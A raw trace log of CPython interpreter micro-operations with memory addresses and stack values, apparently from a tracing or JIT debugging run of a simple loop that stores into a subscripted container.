0 1 9223372036854775804 127 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304350768 65535 _STORE_NAME sp=65535 2 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 0 9223372036854775804 127 78 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304350832 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 127 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 9295712209692852480 44 _BINARY_SUBSCR sp65535 1 140702510881792 9223372036854775804 2645304350992 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350912 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 2645304350976 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304351040 65535 _LOAD_CONST sp=65535 0 3 9223372036854775804 2645304350976 65535 _BINARY_OP sp=65535 3 140702510881752 140702510944352 2645304351040 65535 _BINARY_OP sp=65535 1 140702510881752 9223372036854775804 2645304350976 59 _SWAP sp65535 3 140702510881840 9223372036854775804 2645304350912 61 _SWAP sp65535 2 140702510881840 0 0 65535 _STORE_SUBSCR sp=65535 140702510944352 140702510881776 0 1 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350768 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 127 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304350832 65535 _STORE_NAME sp=65535 2 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 0 9223372036854775804 127 78 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304350896 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 127 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 9295712209692852480 44 _BINARY_SUBSCR sp65535 2 140702510881792 9223372036854775804 2645304351056 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350976 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 2645304351040 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304351104 65535 _LOAD_CONST sp=65535 0 3 9223372036854775804 2645304351040 65535 _BINARY_OP sp=65535 3 140702510881752 140702510944352 2645304351104 65535 _BINARY_OP sp=65535 1 140702510881752 9223372036854775804 2645304351040 59 _SWAP sp65535 3 140702510881840 9223372036854775804 2645304350976 61 _SWAP sp65535 2 140702510881840 0 0 65535 _STORE_SUBSCR sp=65535 140702510944352 140702510881776 0 1 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350832 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 127 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304350896 65535 _STORE_NAME sp=65535 2 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 0 9223372036854775804 127 78 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304350960 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 127 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 9295712209692852480 44 _BINARY_SUBSCR sp65535 3 140702510881792 9223372036854775804 2645304351120 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304351040 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 2645304351104 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304351168 65535 _LOAD_CONST sp=65535 0 3 9223372036854775804 2645304351104 65535 _BINARY_OP sp=65535 3 140702510881752 140702510944352 2645304351168 65535 _BINARY_OP sp=65535 1 140702510881752 9223372036854775804 2645304351104 59 _SWAP sp65535 3 140702510881840 9223372036854775804 2645304351040 61 _SWAP sp65535 2 140702510881840 0 0 65535 _STORE_SUBSCR sp=65535 140702510944352 140702510881776 0 1 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350896 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 127 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304350960 65535 _STORE_NAME sp=65535 2 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 0 9223372036854775804 127 78 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304351024 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 127 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 9295712209692852480 44 _BINARY_SUBSCR sp65535 4 140702510881792 9223372036854775804 2645304351184 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304351104 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 2645304351168 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304351232 65535 _LOAD_CONST sp=65535 0 3 9223372036854775804 2645304351168 65535 _BINARY_OP sp=65535 3 140702510881752 140702510944352 2645304351232 65535 _BINARY_OP sp=65535 1 140702510881752 9223372036854775804 2645304351168 59 _SWAP sp65535 3 140702510881840 9223372036854775804 2645304351104 61 _SWAP sp65535 2 140702510881840 0 0 65535 _STORE_SUBSCR sp=65535 140702510944352 140702510881776 0 1 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350960 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 127 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304351024 65535 _STORE_NAME sp=65535 2 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 0 9223372036854775804 127 78 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304351088 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 127 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 9295712209692852480 44 _BINARY_SUBSCR sp65535 5 140702510881792 9223372036854775804 2645304351248 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304351168 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 2645304351232 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304351296 65535 _LOAD_CONST sp=65535 0 3 9223372036854775804 2645304351232 65535 _BINARY_OP sp=65535 3 140702510881752 140702510944352 2645304351296 65535 _BINARY_OP sp=65535 1 140702510881752 9223372036854775804 2645304351232 59 _SWAP sp65535 3 140702510881840 9223372036854775804 2645304351168 61 _SWAP sp65535 2 140702510881840 0 0 65535 _STORE_SUBSCR sp=65535 140702510944352 140702510881776 0 1 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304351024 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 127 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304351088 65535 _STORE_NAME sp=65535 2 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 0 9223372036854775804 127 78 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304351152 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 127 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 9295712209692852480 44 _BINARY_SUBSCR sp65535 6 140702510881792 9223372036854775804 2645304351312 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304351232 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 2645304351296 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304351360 65535 _LOAD_CONST sp=65535 0 3 9223372036854775804 2645304351296 65535 _BINARY_OP sp=65535 3 140702510881752 140702510944352 2645304351360 65535 _BINARY_OP sp=65535 1 140702510881752 9223372036854775804 2645304351296 59 _SWAP sp65535 3 140702510881840 9223372036854775804 2645304351232 61 _SWAP sp65535 2 140702510881840 0 0 65535 _STORE_SUBSCR sp=65535 140702510944352 140702510881776 0 1 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304351088 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 127 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304351152 65535 _STORE_NAME sp=65535 2 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 0 9223372036854775804 127 78 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304351216 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 127 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 9295712209692852480 44 _BINARY_SUBSCR sp65535 7 140702510881792 9223372036854775804 2645304351376 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304351296 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 2645304351360 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304351424 65535 _LOAD_CONST sp=65535 0 3 9223372036854775804 2645304351360 65535 _BINARY_OP sp=65535 3 140702510881752 140702510944352 2645304351424 65535 _BINARY_OP sp=65535 1 140702510881752 9223372036854775804 2645304351360 59 _SWAP sp65535 3 140702510881840 9223372036854775804 2645304351296 61 _SWAP sp65535 2 140702510881840 0 0 65535 _STORE_SUBSCR sp=65535 140702510944352 140702510881776 0 1 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304351152 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 127 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304351216 65535 _STORE_NAME sp=65535 2 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 0 9223372036854775804 127 78 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304351280 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 127 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 9295712209692852480 44 _BINARY_SUBSCR sp65535 8 140702510881792 9223372036854775804 2645304351440 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304351360 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 2645304351424 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304351488 65535 _LOAD_CONST sp=65535 0 3 9223372036854775804 2645304351424 65535 _BINARY_OP sp=65535 3 140702510881752 140702510944352 2645304351488 65535 _BINARY_OP sp=65535 1 140702510881752 9223372036854775804 2645304351424 59 _SWAP sp65535 3 140702510881840 9223372036854775804 2645304351360 61 _SWAP sp65535 2 140702510881840 0 0 65535 _STORE_SUBSCR sp=65535 140702510944352 140702510881776 0 1 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304351216 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 127 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304351280 65535 _STORE_NAME sp=65535 2 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 0 9223372036854775804 127 78 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304351344 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 127 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 9295712209692852480 44 _BINARY_SUBSCR sp65535 9 140702510881792 9223372036854775804 2645304351504 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304351424 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 2645304351488 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304351552 65535 _LOAD_CONST sp=65535 0 3 9223372036854775804 2645304351488 65535 _BINARY_OP sp=65535 3 140702510881752 140702510944352 2645304351552 65535 _BINARY_OP sp=65535 1 140702510881752 9223372036854775804 2645304351488 59 _SWAP sp65535 3 140702510881840 9223372036854775804 2645304351424 61 _SWAP sp65535 2 140702510881840 0 0 65535 _STORE_SUBSCR sp=65535 140702510944352 140702510881776 0 1 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304351280 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 127 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304351344 65535 _STORE_NAME sp=65535 2 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 0 9223372036854775804 127 78 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304351408 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 127 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 9295712209692852480 44 _BINARY_SUBSCR sp65535 10 140702510881792 9223372036854775804 2645304351568 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304351488 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 2645304351552 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304351616 65535 _LOAD_CONST sp=65535 0 3 9223372036854775804 2645304351552 65535 _BINARY_OP sp=65535 3 140702510881752 140702510944352 2645304351616 65535 _BINARY_OP sp=65535 1 140702510881752 9223372036854775804 2645304351552 59 _SWAP sp65535 3 140702510881840 9223372036854775804 2645304351488 61 _SWAP sp65535 2 140702510881840 0 0 65535 _STORE_SUBSCR sp=65535 140702510944352 140702510881776 0 1 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304351344 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 127 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304351408 65535 _STORE_NAME sp=65535 2 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 0 9223372036854775804 127 78 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304351472 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 127 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 9295712209692852480 44 _BINARY_SUBSCR sp65535 11 140702510881792 9223372036854775804 2645304351632 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304351552 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 2645304351616 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304351680 65535 _LOAD_CONST sp=65535 0 3 9223372036854775804 2645304351616 65535 _BINARY_OP sp=65535 3 140702510881752 140702510944352 2645304351680 65535 _BINARY_OP sp=65535 1 140702510881752 9223372036854775804 2645304351616 59 _SWAP sp65535 3 140702510881840 9223372036854775804 2645304351552 61 _SWAP sp65535 2 140702510881840 0 0 65535 _STORE_SUBSCR sp=65535 140702510944352 140702510881776 0 1 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304351408 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 127 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304351472 65535 _STORE_NAME sp=65535 2 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 0 9223372036854775804 127 78 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304351536 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 127 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 9295712209692852480 44 _BINARY_SUBSCR sp65535 12 140702510881792 9223372036854775804 2645304351696 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304351616 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 2645304351680 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304351744 65535 _LOAD_CONST sp=65535 0 3 9223372036854775804 2645304351680 65535 _BINARY_OP sp=65535 3 140702510881752 140702510944352 2645304351744 65535 _BINARY_OP sp=65535 1 140702510881752 9223372036854775804 2645304351680 59 _SWAP sp65535 3 140702510881840 9223372036854775804 2645304351616 61 _SWAP sp65535 2 140702510881840 0 0 65535 _STORE_SUBSCR sp=65535 140702510944352 140702510881776 0 1 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304351472 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 127 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304351536 65535 _STORE_NAME sp=65535 2 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 0 9223372036854775804 127 78 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304351600 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 127 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 9295712209692852480 44 _BINARY_SUBSCR sp65535 13 140702510881792 9223372036854775804 2645304351760 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304351680 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 2645304351744 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304351808 65535 _LOAD_CONST sp=65535 0 3 9223372036854775804 2645304351744 65535 _BINARY_OP sp=65535 3 140702510881752 140702510944352 2645304351808 65535 _BINARY_OP sp=65535 1 140702510881752 9223372036854775804 2645304351744 59 _SWAP sp65535 3 140702510881840 9223372036854775804 2645304351680 61 _SWAP sp65535 2 140702510881840 0 0 65535 _STORE_SUBSCR sp=65535 140702510944352 140702510881776 0 1 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304351536 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 127 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304351600 65535 _STORE_NAME sp=65535 2 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 0 9223372036854775804 127 78 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304351664 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 127 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 9295712209692852480 44 _BINARY_SUBSCR sp65535 14 140702510881792 9223372036854775804 2645304351824 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304351744 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 2645304351808 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304351872 65535 _LOAD_CONST sp=65535 0 3 9223372036854775804 2645304351808 65535 _BINARY_OP sp=65535 3 140702510881752 140702510944352 2645304351872 65535 _BINARY_OP sp=65535 1 140702510881752 9223372036854775804 2645304351808 59 _SWAP sp65535 3 140702510881840 9223372036854775804 2645304351744 61 _SWAP sp65535 2 140702510881840 0 0 65535 _STORE_SUBSCR sp=65535 140702510944352 140702510881776 0 1 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304351600 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 127 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304351664 65535 _STORE_NAME sp=65535 2 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 0 9223372036854775804 127 78 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304351728 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 127 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 9295712209692852480 44 _BINARY_SUBSCR sp65535 15 140702510881792 9223372036854775804 2645304351888 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304351808 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 2645304351872 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304351936 65535 _LOAD_CONST sp=65535 0 3 9223372036854775804 2645304351872 65535 _BINARY_OP sp=65535 3 140702510881752 140702510944352 2645304351936 65535 _BINARY_OP sp=65535 1 140702510881752 9223372036854775804 2645304351872 59 _SWAP sp65535 3 140702510881840 9223372036854775804 2645304351808 61 _SWAP sp65535 2 140702510881840 0 0 65535 _STORE_SUBSCR sp=65535 140702510944352 140702510881776 0 1 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304351664 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 127 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304351728 65535 _STORE_NAME sp=65535 2 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 0 9223372036854775804 127 78 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304351792 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 127 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 9295712209692852480 44 _BINARY_SUBSCR sp65535 16 140702510881792 9223372036854775804 2645304351952 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304351872 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 2645304351936 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304352000 65535 _LOAD_CONST sp=65535 0 3 9223372036854775804 2645304351936 65535 _BINARY_OP sp=65535 3 140702510881752 140702510944352 2645304352000 65535 _BINARY_OP sp=65535 1 140702510881752 9223372036854775804 2645304351936 59 _SWAP sp65535 3 140702510881840 9223372036854775804 2645304351872 61 _SWAP sp65535 2 140702510881840 0 0 65535 _STORE_SUBSCR sp=65535 140702510944352 140702510881776 0 1 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304351728 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 127 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304351792 65535 _STORE_NAME sp=65535 2 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 0 9223372036854775804 127 78 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304351856 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 127 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 9295712209692852480 44 _BINARY_SUBSCR sp65535 17 140702510881792 9223372036854775804 2645304352016 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304351936 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 2645304352000 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304352064 65535 _LOAD_CONST sp=65535 0 3 9223372036854775804 2645304352000 65535 _BINARY_OP sp=65535 3 140702510881752 140702510944352 2645304352064 65535 _BINARY_OP sp=65535 1 140702510881752 9223372036854775804 2645304352000 59 _SWAP sp65535 3 140702510881840 9223372036854775804 2645304351936 61 _SWAP sp65535 2 140702510881840 0 0 65535 _STORE_SUBSCR sp=65535 140702510944352 140702510881776 0 1 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304351792 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 127 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304351856 65535 _STORE_NAME sp=65535 2 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 0 9223372036854775804 127 78 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304351920 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 127 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 9295712209692852480 44 _BINARY_SUBSCR sp65535 18 140702510881792 9223372036854775804 2645304352080 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304352000 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 2645304352064 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304352128 65535 _LOAD_CONST sp=65535 0 3 9223372036854775804 2645304352064 65535 _BINARY_OP sp=65535 3 140702510881752 140702510944352 2645304352128 65535 _BINARY_OP sp=65535 1 140702510881752 9223372036854775804 2645304352064 59 _SWAP sp65535 3 140702510881840 9223372036854775804 2645304352000 61 _SWAP sp65535 2 140702510881840 0 0 65535 _STORE_SUBSCR sp=65535 140702510944352 140702510881776 0 1 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304351856 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 127 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304351920 65535 _STORE_NAME sp=65535 2 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 0 9223372036854775804 127 78 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304351984 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 127 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 9295712209692852480 44 _BINARY_SUBSCR sp65535 19 140702510881792 9223372036854775804 2645304352144 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304352064 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 2645304352128 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304352192 65535 _LOAD_CONST sp=65535 0 3 9223372036854775804 2645304352128 65535 _BINARY_OP sp=65535 3 140702510881752 140702510944352 2645304352192 65535 _BINARY_OP sp=65535 1 140702510881752 9223372036854775804 2645304352128 59 _SWAP sp65535 3 140702510881840 9223372036854775804 2645304352064 61 _SWAP sp65535 2 140702510881840 0 0 65535 _STORE_SUBSCR sp=65535 140702510944352 140702510881776 0 1 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304351920 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 127 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304351984 65535 _STORE_NAME sp=65535 2 140702510881992 9223372036854775804 127 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_CONST sp=65535 0 0 9223372036854775804 127 78 _COMPARE_OP sp65535 0 140702510881936 140702510944352 2645304352048 65535 _LOAD_NAME sp=65535 0 140702510881680 9223372036854775804 2645304350576 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 9295712209692852480 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 127 65535 _COPY sp=65535 2 140702510881808 9223372036854775804 9295712209692852480 44 _BINARY_SUBSCR sp65535 20 140702510881792 9223372036854775804 2645304352208 65535 _LOAD_NAME sp=65535 2 140702510881680 9223372036854775804 2645304352128 65535 _LOAD_CONST sp=65535 0 1 9223372036854775804 2645304352192 65535 _BINARY_OP sp=65535 0 140702510881752 140702510944352 2645304352256 65535 _LOAD_CONST sp=65535 0 3 